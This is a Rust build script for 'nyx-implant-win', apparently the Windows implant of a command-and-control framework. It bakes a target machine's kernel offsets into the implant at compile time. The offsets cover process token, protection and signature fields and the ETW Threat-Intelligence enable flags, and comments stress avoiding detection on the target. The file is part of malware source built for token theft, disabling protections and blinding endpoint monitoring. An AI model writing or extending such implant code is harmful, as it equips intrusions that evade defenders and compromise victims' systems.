//! Build script for nyx-implant-win.
//!
//! One compile-time bake remains here:
//!
//! **Kernel offsets** (`OUT_DIR/kernel_offsets.rs`) — see `bake_offsets`.
//! Bakes server-side PDB-resolved offsets when `NYX_OFFSETS` is set.
//!
//! The other bakes moved to the crates whose modules consume them in the
//! WP-C crate split: the malleable-C2 envelopes bake went to the
//! `nyx-implant-net` build script (`envelopes.rs` lives there now), and the
//! server-pubkey / per-build-config bakes went to `nyx-implant-core`
//! (`config.rs` and the `server_pub` include live there now).

use std::env;
use std::fs;
use std::path::Path;

fn main() {
    // Declare the crate's custom cfg flags so recent nightlies (which enable
    // check-cfg by default) don't reject them as `unexpected cfg condition
    // name`. None of these is set in a default build — they are opt-in build
    // flags (e.g. -Z unstable-options builds pass --cfg nyx_diag on the dev
    // box) or read at runtime via `cfg!(...)`. Declaring them here marks them
    // as known-to-be-absent rather than unknown names.
    // (`nyx_fs_allow_protected` moved to the nyx-implant-tasks build script
    // with fs.rs; `nyx_diag` is ALSO declared there for selftests.rs — each
    // crate must declare the cfgs its own sources use.)
    println!("cargo::rustc-check-cfg=cfg(nyx_diag)");
    println!("cargo::rustc-check-cfg=cfg(nyx_skip_sandbox)");

    bake_offsets();
}

// ---- kernel offsets (server-side PDB resolution → compile-time bake) -------

/// When `NYX_OFFSETS` points to an offsets.toml (produced by the server-side
/// PDB resolver from the target's ntoskrnl.pdb), bake those exact offsets as
/// compile-time constants. The resulting `OUT_DIR/kernel_offsets.rs` is
/// included by `version.rs`-adjacent code so the implant uses the target's
/// REAL offsets with ZERO runtime resolution — no pattern scan, no PDB fetch,
/// no suspicious memory traversal on the target.
///
/// When `NYX_OFFSETS` is unset (dev builds), emit a marker so the runtime
/// falls back to the `offsets_table::for_build(build_number())` lookup (which
/// covers all major Win10/11/Server builds from a built-in table).
fn bake_offsets() {
    println!("cargo:rerun-if-env-changed=NYX_OFFSETS");
    let out_dir = env::var("OUT_DIR").unwrap();
    let dest = Path::new(&out_dir).join("kernel_offsets.rs");

    let src = match env::var("NYX_OFFSETS") {
        Ok(path) => {
            let p = Path::new(&path);
            println!("cargo:rerun-if-changed={}", p.display());
            let text = fs::read_to_string(p)
                .unwrap_or_else(|e| panic!("NYX_OFFSETS={} unreadable: {e}", p.display()));
            let offsets = parse_offsets_toml(&text);
            emit_baked_offsets(&offsets)
        }
        Err(_) => {
            // No baked offsets — runtime uses the offsets_table lookup.
            String::from(
                "// Generated by build.rs — NYX_OFFSETS was unset.\n\
                 // Runtime falls back to offsets_table::for_build(build_number()).\n\
                 pub const OFFSETS_BAKED: bool = false;\n",
            )
        }
    };
    fs::write(&dest, src).unwrap();
}

/// Parsed kernel offsets from the server-side PDB resolver output.
struct KernelOffsets {
    eprocess_unique_process_id: usize,
    eprocess_active_process_links: usize,
    eprocess_token: usize,
    eprocess_image_file_name: usize,
    eprocess_signature_level: usize,
    eprocess_section_signature_level: usize,
    eprocess_protection: usize,
    etw_ti_guid_entry_to_provider_block: usize,
    etw_ti_provider_block_to_enable_info: usize,
    etw_ti_is_enabled_within_enable_info: usize,
}

/// Parse the offsets.toml format produced by the server-side PDB resolver.
/// Keys: `eprocess.unique_process_id = 0x2e0`, etc. (hex or decimal usize).
fn parse_offsets_toml(text: &str) -> KernelOffsets {
    let mut o = KernelOffsets {
        eprocess_unique_process_id: 0,
        eprocess_active_process_links: 0,
        eprocess_token: 0,
        eprocess_image_file_name: 0,
        eprocess_signature_level: 0,
        eprocess_section_signature_level: 0,
        eprocess_protection: 0,
        etw_ti_guid_entry_to_provider_block: 0,
        etw_ti_provider_block_to_enable_info: 0,
        etw_ti_is_enabled_within_enable_info: 0,
    };
    for raw in text.lines() {
        let line = raw.split('#').next().unwrap_or("").trim();
        if line.is_empty() {
            continue;
        }
        let Some((k, v)) = line.split_once('=') else {
            continue;
        };
        let key = k.trim();
        let val = v.trim();
        // Parse as usize (hex 0x.. or decimal usize).
        let n = if let Some(hex) = val.strip_prefix("0x").or_else(|| val.strip_prefix("0X")) {
            usize::from_str_radix(hex, 16).unwrap_or(0)
        } else {
            val.parse::<usize>().unwrap_or(0)
        };
        match key {
            "eprocess.unique_process_id" => o.eprocess_unique_process_id = n,
            "eprocess.active_process_links" => o.eprocess_active_process_links = n,
            "eprocess.token" => o.eprocess_token = n,
            "eprocess.image_file_name" => o.eprocess_image_file_name = n,
            "eprocess.signature_level" => o.eprocess_signature_level = n,
            "eprocess.section_signature_level" => o.eprocess_section_signature_level = n,
            "eprocess.protection" => o.eprocess_protection = n,
            "etw_ti.guid_entry_to_provider_block" => o.etw_ti_guid_entry_to_provider_block = n,
            "etw_ti.provider_block_to_enable_info" => o.etw_ti_provider_block_to_enable_info = n,
            "etw_ti.is_enabled_within_enable_info" => o.etw_ti_is_enabled_within_enable_info = n,
            _ => {}
        }
    }
    o
}

/// Emit the baked offsets as Rust constants. The runtime `version.rs` (or
/// equivalent) reads these via `include!(concat!(env!("OUT_DIR"), "/kernel_offsets.rs"))`.
fn emit_baked_offsets(o: &KernelOffsets) -> String {
    format!(
        "// Generated by build.rs from NYX_OFFSETS (server-side PDB resolution).\n\
         // Do not edit — these are the target's REAL kernel offsets, baked at build time.\n\
         pub const OFFSETS_BAKED: bool = true;\n\
         pub const EPROCESS_UNIQUE_PROCESS_ID: usize = {:#x};\n\
         pub const EPROCESS_ACTIVE_PROCESS_LINKS: usize = {:#x};\n\
         pub const EPROCESS_TOKEN: usize = {:#x};\n\
         pub const EPROCESS_IMAGE_FILE_NAME: usize = {:#x};\n\
         pub const EPROCESS_SIGNATURE_LEVEL: usize = {:#x};\n\
         pub const EPROCESS_SECTION_SIGNATURE_LEVEL: usize = {:#x};\n\
         pub const EPROCESS_PROTECTION: usize = {:#x};\n\
         pub const ETW_TI_GUID_ENTRY_TO_PROVIDER_BLOCK: usize = {:#x};\n\
         pub const ETW_TI_PROVIDER_BLOCK_TO_ENABLE_INFO: usize = {:#x};\n\
         pub const ETW_TI_IS_ENABLED_WITHIN_ENABLE_INFO: usize = {:#x};\n",
        o.eprocess_unique_process_id,
        o.eprocess_active_process_links,
        o.eprocess_token,
        o.eprocess_image_file_name,
        o.eprocess_signature_level,
        o.eprocess_section_signature_level,
        o.eprocess_protection,
        o.etw_ti_guid_entry_to_provider_block,
        o.etw_ti_provider_block_to_enable_info,
        o.etw_ti_is_enabled_within_enable_info,
    )
}
